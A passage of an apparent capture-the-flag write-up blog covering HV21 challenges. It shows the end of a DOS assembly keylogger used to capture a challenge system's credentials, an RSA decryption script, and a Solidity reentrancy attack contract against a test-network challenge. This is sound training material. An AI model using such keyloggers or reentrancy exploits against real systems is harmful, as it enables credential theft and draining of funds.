logfile\n\t\tint   \t21h\n\t\tmov   \thandle, ax\n\t\tjnc   \tclog4\nclog3:\n\t\tmov\tah, 3Ch         ;Create new file if not opened\n\t\tmov\tcx, 02h\n\t\tlea\tdx, logfile\n\t\tint\t21h\n\t\tmov\thandle, ax\nclog4:\n\t\tmov\tbx, handle      ;Remember file handle\n\t\tmov\tah, 3Eh\t\t;Close file\n\t\tint\t21h\n\t\tret\nalready_inst:\n\t\tmov\tdx, offset already_msg\n\t\tmov\tah, 09h\n\t\tint\t21h\n\t\tjmp\texit\nexit:\n\t\tint\t20h\nok_installed\tdb 'KEYLOG successful installed$'\nalready_msg\tdb 'KEYLOG already installed$'\nend\tStart<\/pre>\n\n\n\n<p>We use <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/open-watcom\/open-watcom-v2\" target=\"_blank\">Open Watcom v2<\/a> to compile the code. Of help in using Watcom were also these two links:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/wiki.archlinux.org\/title\/Open_Watcom\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/wiki.archlinux.org\/title\/Open_Watcom<\/a><\/li>\n\n\n\n<li><a href=\"http:\/\/ptspts.blogspot.com\/2020\/04\/openwatcom-exeprog.html\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/ptspts.blogspot.com\/2020\/04\/openwatcom-exeprog.html<\/a><\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ wasm keylogger.asm\n$ wlink sys dos com name keylogger.com file keylogger.o\n$ mkdir img; sudo mount -o loop fdb.img img\n$ cp keylogger.com img\/k.com\n$ cat init.bat\nb:\nk.com\n$ sudo umount img<\/pre>\n\n\n\n<p>Now we can upload the fdb.img to the website and wait until the routine has completed. Afterwards we should be able to download the fdb.img again, as the content has changed. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-79-1024x449.png\" alt=\"\" class=\"wp-image-1836\"\/><\/figure>\n\n\n\n<p>And voila, there is the file OUTPUT.TXT.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-80-1024x368.png\" alt=\"\" class=\"wp-image-1837\"\/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Step 2 &#8211; Decode scan codes<\/h3>\n\n\n\n<p>I didn&#8217;t find an automatic way to convert the scan codes to actual characters. Thus, I used this <a rel=\"noreferrer noopener\" href=\"http:\/\/cc.etsii.ull.es\/ftp\/antiguo\/TC\/AOA\/CH20\/Ch20.pdf\" target=\"_blank\">pdf file<\/a> to do it manually. I converted all the keystrokes and saved them in a text file.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">38 \t\t--&gt; ALT (DOWN)\n18 98 \t--&gt; O (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n19 99\t--&gt; P (Down, UP)\n04 84  \t--&gt; 3 (Down, UP)\n13 93 \t--&gt; R (Down, UP)\n38\t\t--&gt; ALT (Down)\n1e 9e \t--&gt; A (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n14 94\t--&gt; T (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n1c 9c \t--&gt; ENTER (DOWN, UP)\n----\n1d\t\t--&gt; CTRL (DOWN)\n02 82 \t--&gt; 1! (DOWN, UP)\n9d \t\t--&gt; CTRL (UP)\n38 \t\t--&gt; ALT (DOWN)\n02 82 \t--&gt; 1! (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n38\t\t--&gt; ALT (DOWN)\n1f 9f \t--&gt; S (DOWN, UP)\nb8 \t\t--&gt; ATL (UP)\n16 96\t--&gt; U (DOWN, UP)\n19 99\t--&gt; P (DOWN, UP)\n19 99  \t--&gt; P (DOWN, UP)\n12 92 \t--&gt; E (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n2a\t\t--&gt; L-SHIFT (DOWN)\n39 b9\t--&gt; SPACE (DOWN, UP)\naa\t\t--&gt; L-SHIFT (UP)\n2a\t\t--&gt; L-SHIFT (DOWN)\n1f 9f \t--&gt; S (DOWN, UP)\naa \t\t--&gt; L-SHIFT (UP)\n12 92\t--&gt; E (DOWN, UP)\n2e ae\t--&gt; C (DOWN, UP)\n16 96 \t--&gt; U (DOWN, UP)\n13 93 \t--&gt; R (DOWN, UP)\n12 92\t--&gt; E (DOWN, UP)\n38 \t\t--&gt; ALT (DOWN)\n39 b9 \t--&gt; SPACE (DOWN, UP)\nb8 \t\t--&gt; ALT (UP)\n19 99\t--&gt; P (DOWN, UP)\n38\t\t--&gt; ALT (DOWN)\n1e 9e \t--&gt; A (DOWN, UP)\nb8\t\t--&gt; ALT (UP)\n06 86 \t--&gt; 5% (DOWN, UP)\n06 86 \t--&gt; 5% (DOWN, UP)\n11 91\t--&gt; W (DOWN, UP)\n38 \t\t--&gt; alt\n18 98 \t--&gt; O (DOWN, UP)\nb8 \t\t--&gt; ATL\n13 93 \t--&gt; R (DOWN, UP)\n20 a0 \t--&gt; D (DOWN, UP)\n38 \t\t--&gt; ALT\n03 83 \t--&gt; 2@ (DOWN, UP)\nb8 \t\t--&gt; ALT\n1d \t\t--&gt; CTRL (DOWN)\n05 85 \t--&gt; 4$ (DOWN, UP)\n9d \t\t--&gt; CTRL (UP)\n1d \t\t--&gt; CTRL\n09 89 \t--&gt; 8* (DOWN, UP)\n9d \t\t--&gt; CTRL\n17 97 \t--&gt; I (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n39 b9 \t--&gt; SPACE (DOWN, UP)\naa\t\t--&gt; LSHIFT\n23 a3\t--&gt; H (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n19 99 \t--&gt; P (DOWN, UP)\n12 92\t--&gt; E (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n39 b9 \t--&gt; SPACE (DOWN, UP)\naa\t\t--&gt; LSHIFT\n17 97 \t--&gt; I (DOWN, UP)\n14 94  \t--&gt; T (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n2b ab \t--&gt; \\| (DOWN, UP)\naa \t\t--&gt; LSHIFT\n1f 9f \t--&gt; S (DOWN, UP)\n2a\t\t--&gt; LSHFT\n35 b5 \t--&gt; \/? (DOWN, UP)\naa \t\t--&gt; LSHIFT\n26 a6 \t--&gt; L (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n31 b1\t--&gt; N (DOWN, UP)\n22 a2 \t--&gt; G (DOWN, UP)\n2a \t\t--&gt; LSHIFT\n35 b5 \t--&gt; \/? (DOWN, UP)\naa \t\t--&gt; LSHIFT\n12 92\t--&gt; E (DOWN, UP)\n31 b1 \t--&gt; N (DOWN, UP)\n18 98 \t--&gt; O (DOWN, UP)\n16 96\t--&gt; U (DOWN, UP)\n22 a2\t--&gt; G (DOWN, UP)\n23 a3 \t--&gt; H (DOWN, UP)\n14 94\t--&gt; T (DOWN, UP)\n1d\t\t--&gt; CTRL\n06 86 \t--&gt; 5% (DOWN, UP)\n9d\t\t--&gt; CTRL<\/pre>\n\n\n\n<p>There are many special characters in the username and password, which I never could have entered manually myself. Fortunately, there is the compatmonitor in qemu which has the function &#8220;sendkeys&#8221;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-81-1024x996.png\" alt=\"\" class=\"wp-image-1838\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-82-1024x852.png\" alt=\"\" class=\"wp-image-1839\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{hack1ng_l1ke_th3_90s}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.20] Trolling Crypto Elves<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-37.png\" alt=\"\" class=\"wp-image-1738\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>ice<\/em>. Don&#8217;t break everything!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves have been back to school and now they&#8217;re trolling Santa. They&#8217;ve encrypted a message and are challenging him to decrypt it. Of course Santa doesn&#8217;t want to look stupid, so he&#8217;s asking you for help.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Would you mind decrypting&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/59de7b83-a1ed-4fee-98ed-40218a6673c5.zip\" target=\"_blank\" rel=\"noreferrer noopener\">the message<\/a>&nbsp;and letting Santa know what&#8217;s in it? You&#8217;ll get a cookie in return (well, a flag-shaped one, but aren&#8217;t those the best?).<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>We get a public key and an encrypted message, stored in a binary file. The public key is an RSA key with a weird exponent of 4242.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-84-1024x556.png\" alt=\"\" class=\"wp-image-1843\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-83-1024x489.png\" alt=\"\" class=\"wp-image-1842\"\/><\/figure>\n\n\n\n<p>Looks like we have to do the RSA calculation ourselves. Once again I googled for similar CTF challenges and did find these two interesting posts:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"http:\/\/hacktracking.blogspot.com\/2013\/11\/cscamp-ctf-quals-2k13-crypto-public-is.html\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/hacktracking.blogspot.com\/2013\/11\/cscamp-ctf-quals-2k13-crypto-public-is.html<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/VulnHub\/ctf-writeups\/blob\/master\/2015\/eko-party-pre-ctf\/rsa-2070.md\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/VulnHub\/ctf-writeups\/blob\/master\/2015\/eko-party-pre-ctf\/rsa-2070.md<\/a><\/li>\n<\/ul>\n\n\n\n<p>Given is already n (Modulus), e (Exponent), c (encrypted message). We need p &amp; q to calculate everything we need.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">n = p*q<\/pre>\n\n\n\n<p>RSA is built on the factorization problem, which should not allow us to get p &amp; q if we have n. There is the website factordb.com which has pre-calculated factorizations. <a rel=\"noreferrer noopener\" href=\"http:\/\/factordb.com\/index.php?query=21841229176641676811074222222429036686010157493819478906104756224784026782720095285562077658175994506814988868039420867464335127876647084137268626334223518969271953762934538192829593027351087506564856372252764608983654907443877304590598039308085484230387424168108589912364744981715047690934796624671825840761147121835935311518027061488285356813614197767377798508227633097728683793773240697883725855674919223272992158621864652379194787743287739980453395882286994644048503221607873267720518809023683802183778543479285200786684047572628386266548042179603137730815862594760654189158575192864779821225861303652435417736529\" target=\"_blank\">Let&#8217;s see if we find the primes for our n<\/a>. There is a factorization available! p &amp; q are even the same number. We now have the following:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">- n: 21841229176641676811074222222429036686010157493819478906104756224784026782720095285562077658175994506814988868039420867464335127876647084137268626334223518969271953762934538192829593027351087506564856372252764608983654907443877304590598039308085484230387424168108589912364744981715047690934796624671825840761147121835935311518027061488285356813614197767377798508227633097728683793773240697883725855674919223272992158621864652379194787743287739980453395882286994644048503221607873267720518809023683802183778543479285200786684047572628386266548042179603137730815862594760654189158575192864779821225861303652435417736529\n- e: 4242\n- p: 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977\n- q: 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977<\/pre>\n\n\n\n<p>Unfortunately, the standard calculation examples for this problem don&#8217;t work. This, because we have two special cases in this challenge.<br>1) p == q <br>Solution &#8211;&gt; phi = p * (p &#8211; 1) instead of phi = (p &#8211; 1)(q &#8211; 1)<\/p>\n\n\n\n<p>2) gcd(phi_n, e) != 1 <br>Solution &#8211;&gt;  can be found here: <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/HackThisSite\/CTF-Writeups\/blob\/master\/2017\/EasyCTF\/RSA%204\/README.md\" target=\"_blank\">https:\/\/github.com\/HackThisSite\/CTF-Writeups\/blob\/master\/2017\/EasyCTF\/RSA%204\/README.md<\/a><\/p>\n\n\n\n<p>We now have collected all the puzzle pieces to solve the challenge. The final script is:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from Crypto.Util.number import long_to_bytes\nfrom Crypto.PublicKey import RSA\nimport gmpy2\nimport base64\n'''\nSupporting blog posts:\n- http:\/\/hacktracking.blogspot.com\/2013\/11\/cscamp-ctf-quals-2k13-crypto-public-is.html\n- https:\/\/github.com\/VulnHub\/ctf-writeups\/blob\/master\/2015\/eko-party-pre-ctf\/rsa-2070.md\n'''\npublic_key ='''-----BEGIN PUBLIC KEY-----\nMIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQEArQQPi5eDjcWTz\/cZToY9\nV9WjmbvvbN7P3W2NTdAYCd7EryshptEUsPdXbeTHrWObEROG0ZMrGFrWY4G33sXN\nZsdZ\/AYwRSfQdH2bA5nqrTWIcxJRiDShBgD\/w99BYqJH+d7qpPbRGdJJWYYQN1LJ\nXLdUyZvH4VTQMq7wbu+Gly9NUxaTVpDTgm3PSBfjiBIcWBy7yGI1VU2Leuf0Ik+4\nystrTn4CgFKbyTxBEAB9f2kvemePqH2w2\/9lkHJF9zDGp4MrWcA+1GOQjjYl5cM8\n3xd\/eZh04GglIS4cbNt4jHma0SfivbemNOMOgW9lAbItIZvD\/1s2lrOZE2jd7zWl\nUQICEJI=\n-----END PUBLIC KEY-----'''\nencrypted_message = '''CRb31iikjWfVXYQI7K6WffS2XIpticw4+a7d8CY+9SHNdO3GysZo2U3NJ6bKoPe5\/OWj8NwoYU\/M\njp8GrJ9ZXiUg1V+sGnXJIuU\/hPIHWWsYiAzxyO1XLJ+rDr6PU6e3e3rBn9weat9ovt8dqtxsqNKt\naXgmjt+XEwf9\/4rL0kJfWdSh\/qi3ITu42AnRMjeZitPb2bwpYhbl\/3zT3sn6pJBtgeKKmYdjrNYs\nZMwJZvkjw75GwzVl2JIuMzHBVwgX2Ca6B6oyccINYrqZOlvex8k3TLqBTLAk3ls7nxVILEQcLtLh\n5\/ORI1OFb1Lj46dIyn0ZTdvkrDjo2\/ruhT5btQ=='''\npubkey = RSA.importKey(public_key)\np = 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977\nq = 147787784260545962118188414836562419091239637174246137547080224512674547409696632337716736540029480316926476778997662919589650979117808985601704630621987476641319630228351149280459382305077484493057997870551421060027289012740657904610013731896147312992127289391935096623938889140237400984329575053824496483977\nc = int.from_bytes(base64.b64decode(encrypted_message), 'big')\nn = pubkey.n\ne = pubkey.e\nprint(\"[+] Got values:\")\nprint(\"- n: \" + str(n))\nprint(\"- e: \" + str(e))\nprint(\"- p: \" + str(p))\nprint(\"- q: \" + str(q))\n# phi = (p-1)*(q-1), but when p=q then p *(p-1)\nphi = p * (p - 1)\ng = gmpy2.gcd(e, phi)\ne \/\/= g\nd = gmpy2.invert(e, phi)\nm = pow(c, d, n)\nm, _ = gmpy2.iroot(m, g)\nprint(\"----\")\nprint(\"[!!] \" + str(long_to_bytes(m)))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-85-1024x302.png\" alt=\"\" class=\"wp-image-1844\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{F3M4TS L1TTL3 TH30R3M}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.21] Re-Entry to Nice List<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-38.png\" alt=\"\" class=\"wp-image-1739\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>HaCk0<\/em>. For sure on the nice list!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves are going web3! Also, Santa needs money to produce the toys (did you really think anything is for free?!). In order not be a boomer and to raise more than the&nbsp;<em>ConstitutionDAO<\/em>, he tasked his elves with creating a smart contract for people to buy into the nice list.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-39-1024x577.png\" alt=\"\" class=\"wp-image-1740\"\/><\/figure>\n\n\n\n<p>Unfortunately, the elves weren&#8217;t up to the task and only were able to put the deeds counter on to the blockchain. You have to submit one good deed per month to get on to the nice list.<\/p>\n\n\n\n<p>Unluckily for you, Christmas is in a few days and you can only submit 1 deed per month (or in blockchain terms: every 172800 blocks). Or can you get your counter to 0 in time?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Contract address:&nbsp;<code>0x82Ff67Ed282eFdeBcE2BA1176d65f39762Ce1cc5<\/code><\/li>\n\n\n\n<li>Network used: Etherum Rinkeby (Test Network)<\/li>\n\n\n\n<li>Create a Wallet: use the&nbsp;<em>metamask<\/em>&nbsp;browser extension\n<ul class=\"wp-block-list\">\n<li>If you&#8217;ve already connected to the server before installing, reload your page.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Get some ETH at e.g.\n<ul class=\"wp-block-list\">\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/faucets.chain.link\/rinkeby\" target=\"_blank\">https:\/\/faucets.chain.link\/rinkeby<\/a><\/li>\n\n\n\n<li><a rel=\"noreferrer noopener\" href=\"https:\/\/faucet.rinkeby.io\/\" target=\"_blank\">https:\/\/faucet.rinkeby.io\/<\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Another Blockchain challenge, I solved this one as second \\o\/. Did I mention that I like Blockchain challenges? \ud83d\ude09 Once again, I worked with the remix application and Metamask. <\/p>\n\n\n\n<p>Once connected to Metamask the challenge website looks like this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"672\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-1024x672.png\" alt=\"\" class=\"wp-image-1847\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-1024x672.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-300x197.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86-768x504.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-86.png 1206w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>On <a href=\"https:\/\/rinkeby.etherscan.io\/address\/0x82ff67ed282efdebce2ba1176d65f39762ce1cc5#code\" target=\"_blank\" rel=\"noreferrer noopener\">etherscan.io<\/a> we can find the source code of the challenge contract. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pragma solidity 0.8.0;\ncontract SantasList {\n    mapping(address => uint256) naughtyList;\n    mapping(address => uint256) nextGoodDeedAfter;\n    function start() public {\n        naughtyList[tx.origin] = 12;\n        nextGoodDeedAfter[tx.origin] = 0;\n    }\n    function goodDeed() public {\n        require(\n            nextGoodDeedAfter[tx.origin] &lt; block.number,\n            \"You have already done your good deed this month\"\n        );\n        if (naughtyList[tx.origin] > 0) {\n            naughtyList[tx.origin] = naughtyList[tx.origin] - 1;\n            (bool success, ) = msg.sender.call(\"\");\n            require(success, \"Call failed\");\n            nextGoodDeedAfter[tx.origin] = block.number + 172800;\n        }\n    }\n    function goodDeedsLeft(address _address) public view returns (uint256) {\n        return naughtyList[_address];\n    }\n    function isNice(address _address) public view returns (bool) {\n        if(nextGoodDeedAfter[_address] > 0 &amp;&amp; naughtyList[_address] == 0) {\n            return true;\n        } else {\n            return false;\n        }\n    }\n}<\/pre>\n\n\n\n<p>The goal of the challenge is to get on to the Nice-List. But we can only report 1 good deed per month. According to the challenge description it is very clear that it has something to do with the <a rel=\"noreferrer noopener\" href=\"https:\/\/www.coindesk.com\/learn\/2016\/06\/25\/understanding-the-dao-attack\/\" target=\"_blank\">DAO hack<\/a>. <\/p>\n\n\n\n<p>Indeed, if we look closer at the source code of the smart contract we can see that there is a <a rel=\"noreferrer noopener\" href=\"https:\/\/consensys.github.io\/smart-contract-best-practices\/known_attacks\/\" target=\"_blank\">Re-Entrancy vulnerability<\/a> in the goodDeed() function. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">function goodDeed() public {\n        require(\n            nextGoodDeedAfter[tx.origin] &lt; block.number,\n            \"You have already done your good deed this month\"\n        );\n        if (naughtyList[tx.origin] > 0) {\n            naughtyList[tx.origin] = naughtyList[tx.origin] - 1;\n            (bool success, ) = msg.sender.call(\"\");\n            require(success, \"Call failed\");\n            nextGoodDeedAfter[tx.origin] = block.number + 172800;\n        }\n    }<\/pre>\n\n\n\n<p>Before &#8220;nextGoodDeedAfter&#8221; is set to block.number + 172800 we have the call to the sender, meaning us\/attacker, of the contract: (bool success, ) = msg.sender.call(&#8220;&#8221;). <\/p>\n\n\n\n<p>Thus, we can create a smart contract on our own. We implement the receive() and fallback() functions which will run when the contract is called and no function is selected. Exactly what happens with &#8220;msg.sender.call(&#8221;)&#8221;. In these functions we recursively call the goodDeed() function of the challenge contract. Now we have a recursive loop, the challenge contract will always call our own contract which will call the challenge contract before this can set the limitation. Here is the my smart contract to solve this challenge:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"java\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/**\n *\n * DAO Hack - Re-Entrancy vulnerability, more details here:\n * - https:\/\/vessenes.com\/more-ethereum-attacks-race-to-empty-is-the-real-deal\/\n * - https:\/\/medium.com\/coinmonks\/ethernaut-lvl-10-re-entrancy-walkthrough-how-to-abuse-execution-ordering-and-reproduce-the-dao-7ec88b912c14\n * - https:\/\/consensys.github.io\/smart-contract-best-practices\/known_attacks\/\n *\n * Executed and deployed with remix:\n * - https:\/\/remix.ethereum.org\/\n *\n *\/\npragma solidity ^0.8.10;\n\/**\n * Interface to Santa Contract:\n * - https:\/\/rinkeby.etherscan.io\/address\/0x82Ff67Ed282eFdeBcE2BA1176d65f39762Ce1cc5#code\n *\/\ninterface SantasList{\n    function start() external;\n    function goodDeed() external;\n    function goodDeedsLeft(address _address) external view returns (uint256);\n    function isNice(address _address) external view returns (bool);\n}\ncontract AttackHV21 {\n    address constant santa = 0x82Ff67Ed282eFdeBcE2BA1176d65f39762Ce1cc5;\n    SantasList sl;\n    constructor() {\n        sl = SantasList(santa);\n    }\n    function start() public {\n        sl.start();\n    }\n    function attack() public {\n        sl.goodDeed();\n    }\n    function checkNice() public view returns (bool) {\n        return sl.isNice(msg.sender);\n    }\n    function checkDeeds() public view returns (uint256) {\n        return sl.goodDeedsLeft(msg.sender);\n    }\n    function getAddress() public view returns(address){\n        return msg.sender;\n    }\n    \/**\n     * These functions execute the attack - not sure which one is called though\n     *\n     * The vulnerable contract calls msg.sender.call(\"\") before the time limit for the next good deed is set.\n     * We can use this vulnerability and recursively call goodDeed, when the contract calls us.\n     * Until we are on the nice list\n     *\/\n    receive() external payable{\n        uint count = 0;\n        if (count &lt;= 12) {\n            sl.goodDeed();\n            count++;\n        }\n    }\n    fallback() external payable{\n        uint count = 0;\n        if (count &lt;= 12) {\n            sl.goodDeed();\n            count++;\n        }\n    }\n}<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"512\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-1024x512.png\" alt=\"\" class=\"wp-image-1848\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-1024x512.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-300x150.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-768x384.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-1536x768.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-2048x1025.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"741\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-1024x741.png\" alt=\"\" class=\"wp-image-1849\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-1024x741.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-300x217.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-768x556.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-1536x1112.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88.png 1716w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{wEb3_4oR_Th3_Win}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.22] Santa&#8217;s Gift Encryptor<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-40.png\" alt=\"\" class=\"wp-image-1741\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkice<\/em>. Keeping gifts safe!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa takes security very seriously and encrypts all his gifts. However, his elves were very busy this year and could not finish the work on the new encryption tool, and therefore it is not possible to decrypt the gifts now. As Christmas is coming closer and closer, we urgently need someone who can finish their work so that the children won&#8217;t be left without presents. And if that wasn&#8217;t already bad enough, Santa has also lost his license key, but that&#8217;s probably the least of our problems.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Find the key for Santa and decrypt&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/0fc3fe0c-8e6f-4a35-bbc7-a430d7c094c6.zip\" target=\"_blank\" rel=\"noreferrer noopener\">your own gift<\/a>!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Typically, I am no fan of reverse engineering challenges, but I liked this one very much! With the challenge comes an ELF binary &#8220;sge&#8221; and a file &#8220;gift.enc&#8221; which contains the encrypted message\/flag. I used Ghidra to analyze the binary file. <\/p>\n\n\n\n<p>The main function calls three functions if the binary file is opened correctly. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"602\" height=\"448\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-89.png\" alt=\"\" class=\"wp-image-1851\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-89.png 602w, 